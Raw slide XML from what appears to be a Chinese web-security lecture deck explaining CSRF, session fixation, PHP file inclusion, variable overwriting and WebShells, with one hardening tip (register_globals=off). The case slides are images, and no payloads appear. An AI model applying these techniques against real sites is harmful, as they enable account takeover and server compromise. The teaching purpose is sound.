        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19540139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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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24744"/>
            <a:ext cx="8341400"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18848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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，跨站点伪造请求）是一种网络攻击方式，该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点，从而在未授权的情况下执行在权限保护之下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体来讲，可以这样理解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击：攻击者盗用了你的身份，以你的名义发送恶意请求，对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作，比如以你的名义发送邮件、发消息，盗取你的账号，添加系统管理员，甚至于购买商品、虚拟货币转账等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20510304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会话固定攻击原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3873052367"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611560" y="1052736"/>
          <a:ext cx="7851775" cy="4751387"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s3174" name="Visio" r:id="rId4" imgW="5817960" imgH="3520386" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="5817960" imgH="3520386" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr/>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId5"/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="611560" y="1052736"/>
                        <a:ext cx="7851775" cy="4751387"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17217937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会话固定攻击案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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980728"/>
            <a:ext cx="4886325"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4437112"/>
            <a:ext cx="493395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5" y="2847206"/>
            <a:ext cx="5457825"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9592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会话固定攻击风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>会话固定攻击中，攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>者从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应用程序中直接获取一个匿名令牌，然后使用某种方法将这个令牌固定在一名受害者的浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，等待受害者利用该令牌登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>应用。一旦受害者登录，攻击者可以劫持受害者会话，进行非授权的任意访问。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37773622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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件包含漏洞原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>严格来说，文件包含漏洞是“代码注入”的一种，本质也是违背了数据与代码隔离的原则。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在互连</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网的安全史上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件包含漏洞已经臭名昭著，造成了数不胜数的“血案”，是“代码注入”的典型代表。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>原理就注入一段用户能控制的脚本或代码，并让服务器端执行，分为本地文件包含于远程文件包含两种类型。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中常见导致文件包含的函数有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>include()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>include_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>require()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>require_once()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3856524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安全的发展</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Web1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时代，黑客更多的是关注服务器端动态脚本的安全问题，比如将一个可执行脚本（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）上传到服务器上，从而获得权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>动态脚本语言的普及以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>技术发展初期对安全问题认知的不足虽然导致很多“血案”的发生，但远未达到泛滥不可控的程度。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35528181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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本地文件包含案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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7664" y="1052736"/>
            <a:ext cx="6036502" cy="5184576"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="185022118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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件包含案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的配置选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>allow_uri_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的话，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>include()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>require()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数是可以加载远程文件的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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492896"/>
            <a:ext cx="5976664" cy="3102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19579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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变量覆盖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中，如果其配置文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中配置选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>register_globals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全局变量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$_GET[‘c’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是一样的，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>只是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中声明局部变量的方式。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变量覆盖就是普通局部变量的作用范围扩大导致可以被全局变量覆盖，改变程序走向。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329812594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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变量覆盖案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="内容占位符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9552" y="980728"/>
            <a:ext cx="6341663" cy="5008235"/>
          </a:xfrm>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4221997"/>
            <a:ext cx="4476750"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77016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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变量覆盖风险</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变量覆盖可以改变程序走向，严重的可以执行系统命令，所以在部署站点的时候应该确保</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>配置选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>register_globals=off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29298321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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网页木马原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1340768"/>
            <a:ext cx="8229600" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，顾名思义，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”的含义需要服务器开放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>”的含义是取得对服务器某种程度上的操作权限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>就是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后缀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.aspx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的动态脚本文件，跟普通的站点网页脚本文件后缀名一样，不过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
